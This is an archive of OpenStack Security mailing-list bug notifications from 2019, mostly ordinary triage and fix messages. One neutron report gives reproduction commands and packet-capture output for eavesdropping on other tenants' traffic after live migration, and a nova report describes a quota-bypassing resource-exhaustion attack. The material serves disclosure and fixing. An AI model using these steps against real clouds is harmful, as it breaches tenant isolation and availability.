From 1816836 at bugs.launchpad.net Fri Mar 1 00:05:53 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 01 Mar 2019 00:05:53 -0000 Subject: [Openstack-security] [Bug 1816836] Re: manila's devstack plugin fails with tls_proxy enabled References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155139875337.32254.1698386768668046227.malone@wampee.canonical.com> Reviewed: https://review.openstack.org/638320 Committed: https://git.openstack.org/cgit/openstack/manila/commit/?id=8f1c7dc91fb1e00784f6228526d95f4434ba8a01 Submitter: Zuul Branch: master commit 8f1c7dc91fb1e00784f6228526d95f4434ba8a01 Author: Goutham Pacha Ravi Date: Wed Feb 20 18:00:45 2019 -0800 Fix tls-proxy issues with the devstack plugin Enabling tls-proxy allows devstack to set up a tls proxy server that front-ends interactions with the manila-api and terminates tls connections. Also enable tls-proxy in dummy and lvm jobs. The dummy driver job is configured to run the in-built wsgi server, the lvm job is configured to use mod-wsgi. Closes-Bug: #1816836 Change-Id: I48b0ccc082604d78242ba61bee94a45efeb2467b ** Changed in: manila Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. [1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From 1816836 at bugs.launchpad.net Fri Mar 1 00:29:16 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 01 Mar 2019 00:29:16 -0000 Subject: [Openstack-security] [Bug 1816836] Fix proposed to manila (stable/rocky) References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155140015701.18604.18214609142231656115.malone@gac.canonical.com> Fix proposed to branch: stable/rocky Review: https://review.openstack.org/640230 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. 
[1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From 1816836 at bugs.launchpad.net Fri Mar 1 00:30:01 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 01 Mar 2019 00:30:01 -0000 Subject: [Openstack-security] [Bug 1816836] Change abandoned on manila (stable/rocky) References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155140020111.17116.6051341137410526075.malone@soybean.canonical.com> Change abandoned by Goutham Pacha Ravi (gouthampravi at gmail.com) on branch: stable/rocky Review: https://review.openstack.org/640230 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. [1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From 1734320 at bugs.launchpad.net Fri Mar 1 04:54:26 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 01 Mar 2019 04:54:26 -0000 Subject: [Openstack-security] [Bug 1734320] Fix proposed to neutron (master) References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <155141606659.28693.6732345715650983669.malone@chaenomeles.canonical.com> Fix proposed to branch: master Review: https://review.openstack.org/640258 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports that are administratively down, even between tenants' self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues.
We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. 
Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, 
length 28
13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24
13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20

Workaround
----------

We temporarily fixed this issue by forcing the dead vlan tag on port creation on compute nodes:

/usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py:

 def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,
                         instance_id, interface_type=None,
                         vhost_server_path=None):
+    # ODCN: initialize port as dead
+    # ODCN: TODO: set drop flow
     cmd = ['--', '--if-exists', 'del-port', dev, '--',
            'add-port', bridge, dev,
+           'tag=4095',
            '--', 'set', 'Interface', dev,
            'external-ids:iface-id=%s' % iface_id,
            'external-ids:iface-status=active',
            'external-ids:attached-mac=%s' % mac,
            'external-ids:vm-uuid=%s' % instance_id]
     if interface_type:
         cmd += ['type=%s' % interface_type]
     if vhost_server_path:
         cmd += ['options:vhost-server-path=%s' % vhost_server_path]
     return cmd

https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995

     def port_dead(self, port, log_errors=True):
         '''Once a port has no binding, put it on the "dead vlan".

         :param port: an ovs_lib.VifPort object.
         '''
         # Don't kill a port if it's already dead
         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",
                                          log_errors=log_errors)
+        # ODCN GM 20170915
+        if not cur_tag:
+            LOG.error('port_dead(): port %s has no tag', port.port_name)
+        # ODCN AJS 20170915
+        if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG:
-        if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:
             LOG.info('port_dead(): put port %s on dead vlan', port.port_name)
             self.int_br.set_db_attribute("Port", port.port_name, "tag",
                                          constants.DEAD_VLAN_TAG,
                                          log_errors=log_errors)
             self.int_br.drop_port(in_port=port.ofport)

plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py

     def drop_port(self, in_port):
+        # ODCN AJS 20171004:
-        self.install_drop(priority=2, in_port=in_port)
+        self.install_drop(priority=65535, in_port=in_port)

Regards,
ODC Noord.
Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1501808 at bugs.launchpad.net Tue Mar 12 13:20:06 2019 From: 1501808 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 12 Mar 2019 13:20:06 -0000 Subject: [Openstack-security] [Bug 1501808] Change abandoned on nova (master) References: <20151001152652.22834.78736.malonedeb@gac.canonical.com> Message-ID: <155239680671.1787.10494296282895724732.malone@wampee.canonical.com> Change abandoned by Matt Riedemann (mriedem.os at gmail.com) on branch: master Review: https://review.openstack.org/407877 Reason: Duplicate of https://review.openstack.org/#/c/386756/ which was abandoned and I'm going to abandon this also - as noted in that other review, this would be a change in behavior and requires wider discussion. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1501808 Title: Enabling soft-deletes opens a DOS on compute hosts Status in OpenStack Compute (nova): Opinion Status in OpenStack Security Advisory: Won't Fix Bug description: If the user sets reclaim_instance_interval to anything other than 0, then when a user requests an instance delete, it will instead be soft deleted. Soft delete explicitly releases the user's quota, but does not release the instance's resources until period task _reclaim_queued_deletes runs with a period of reclaim_instance_interval seconds. A malicious authenticated user can repeatedly create and delete instances without limit, which will consume resources on the host without consuming their quota. If done quickly enough, this will exhaust host resources. I'm not entirely sure what to suggest in remediation, as this seems to be a deliberate design. The most obvious fix would be to not release quota until the instance is reaped, but that would be a significant change in behaviour. This is very similar to https://bugs.launchpad.net/bugs/cve/2015-3280 , except that we do it deliberately. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1501808/+subscriptions From morgan.fainberg at gmail.com Wed Mar 13 18:43:03 2019 From: morgan.fainberg at gmail.com (Morgan Fainberg) Date: Wed, 13 Mar 2019 18:43:03 -0000 Subject: [Openstack-security] [Bug 1819957] [NEW] Caching with stale data when a server disconnects due to network partition and reconnects Message-ID: <155250258380.27992.5839797432076968036.malonedeb@wampee.canonical.com> *** This bug is a security vulnerability *** Public security bug reported: The flush_on_reconnect optional flag is not used. This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. 
If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. ** Affects: keystone Importance: High Assignee: Morgan Fainberg (mdrnstm) Status: New ** Affects: keystonemiddleware Importance: High Assignee: Morgan Fainberg (mdrnstm) Status: New ** Affects: oslo.cache Importance: High Assignee: Morgan Fainberg (mdrnstm) Status: New ** Tags: caching security ** Also affects: keystonemiddleware Importance: Undecided Status: New ** Also affects: oslo.cache Importance: Undecided Status: New ** Tags added: caching security ** Changed in: keystone Importance: Undecided => High ** Changed in: keystonemiddleware Importance: Undecided => High ** Changed in: oslo.cache Importance: Undecided => High ** Changed in: keystone Assignee: (unassigned) => Morgan Fainberg (mdrnstm) ** Changed in: keystonemiddleware Assignee: (unassigned) => Morgan Fainberg (mdrnstm) ** Changed in: oslo.cache Assignee: (unassigned) => Morgan Fainberg (mdrnstm) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1819957 Title: Caching with stale data when a server disconnects due to network partition and reconnects Status in OpenStack Identity (keystone): New Status in keystonemiddleware: New Status in oslo.cache: New Bug description: The flush_on_reconnect optional flag is not used. This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. 
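As a rough illustration only of the proposed remedy (this is not the oslo.cache patch itself; the server addresses and key below are made-up placeholders), passing the documented flag through to python-memcached when the client is constructed would look like this:

    import memcache

    # Placeholder server list; in oslo.cache this would come from configuration.
    servers = ['192.0.2.10:11211', '192.0.2.11:11211']

    # flush_on_reconnect asks the client to flush a server that comes back after
    # an interruption, so it cannot serve values written before the network
    # partition (see the python-memcached docstring quoted in this report).
    client = memcache.Client(servers, flush_on_reconnect=1)

    client.set('example-key', 'example-value', time=300)
    print(client.get('example-key'))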
To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1819957/+subscriptions From 1816836 at bugs.launchpad.net Tue Mar 19 11:17:28 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 19 Mar 2019 11:17:28 -0000 Subject: [Openstack-security] [Bug 1816836] Re: manila's devstack plugin fails with tls_proxy enabled References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155299424904.17795.10892930458869013749.malone@gac.canonical.com> Reviewed: https://review.openstack.org/640230 Committed: https://git.openstack.org/cgit/openstack/manila/commit/?id=edc60f76c2818351f8a6d1090a5549970b1891cc Submitter: Zuul Branch: stable/rocky commit edc60f76c2818351f8a6d1090a5549970b1891cc Author: Goutham Pacha Ravi Date: Wed Feb 20 18:00:45 2019 -0800 Fix tls-proxy issues with the devstack plugin Enabling tls-proxy allows devstack to set up a tls proxy server that front-ends interactions with the manila-api and terminates tls connections. Also enable tls-proxy in dummy and lvm jobs. The dummy driver job is configured to run the in-built wsgi server, the lvm job is configured to use mod-wsgi. Closes-Bug: #1816836 Change-Id: I48b0ccc082604d78242ba61bee94a45efeb2467b (cherry picked from commit 8f1c7dc91fb1e00784f6228526d95f4434ba8a01) ** Tags added: in-stable-rocky -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. [1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From fungi at yuggoth.org Tue Mar 19 13:33:10 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 19 Mar 2019 13:33:10 -0000 Subject: [Openstack-security] [Bug 1819957] Re: Caching with stale data when a server disconnects due to network partition and reconnects References: <155250258380.27992.5839797432076968036.malonedeb@wampee.canonical.com> Message-ID: <155300239070.17831.8394393647031253010.malone@gac.canonical.com> Unless there's a way for a malicious actor to trigger and take advantage of this condition, this is probably a class D (security hardening opportunity) report: https://security.openstack.org/vmt-process.html #incident-report-taxonomy ** Also affects: ossa Importance: Undecided Status: New ** Changed in: ossa Status: New => Won't Fix ** Information type changed from Public Security to Public -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1819957 Title: Caching with stale data when a server disconnects due to network partition and reconnects Status in OpenStack Identity (keystone): Triaged Status in keystonemiddleware: Triaged Status in oslo.cache: New Status in OpenStack Security Advisory: Won't Fix Bug description: The flush_on_reconnect optional flag is not used. 
This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1819957/+subscriptions From 1819957 at bugs.launchpad.net Wed Mar 20 06:25:54 2019 From: 1819957 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 20 Mar 2019 06:25:54 -0000 Subject: [Openstack-security] [Bug 1819957] Re: Caching with stale data when a server disconnects due to network partition and reconnects References: <155250258380.27992.5839797432076968036.malonedeb@wampee.canonical.com> Message-ID: <155306315427.9880.14621491657038385982.malone@wampee.canonical.com> Fix proposed to branch: master Review: https://review.openstack.org/644774 ** Changed in: oslo.cache Status: New => In Progress -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1819957 Title: Caching with stale data when a server disconnects due to network partition and reconnects Status in OpenStack Identity (keystone): Triaged Status in keystonemiddleware: Triaged Status in oslo.cache: In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: The flush_on_reconnect optional flag is not used. This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. 
This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1819957/+subscriptions From fungi at yuggoth.org Wed Mar 20 18:27:39 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 20 Mar 2019 18:27:39 -0000 Subject: [Openstack-security] =?utf-8?q?=5BBug_1816727=5D_Re=3A_nova-novnc?= =?utf-8?q?proxy_does_not_handle_TCP_RST_cleanly_when_using_SSL=C2=A0?= References: <155065649227.28374.17032096910895521610.malonedeb@chaenomeles.canonical.com> Message-ID: <155310646017.32205.3634730266513708251.malone@soybean.canonical.com> Given lack of objections and Melanie's assertion in comment #10 that this doesn't seem to be a vulnerability in websockify itself nor is the condition which is caused by a potential attacker sending TCP/RST packets immediately after an SSL handshake necessarily any more problematic than repeatedly opening SSL connections and dropping them silently without closing, I'm triaging this as a class D (security hardening opportunity) report and switching it to a normal public bug. Please feel free to continue with patch deliberations in normal public code reviews. ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. 
With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner 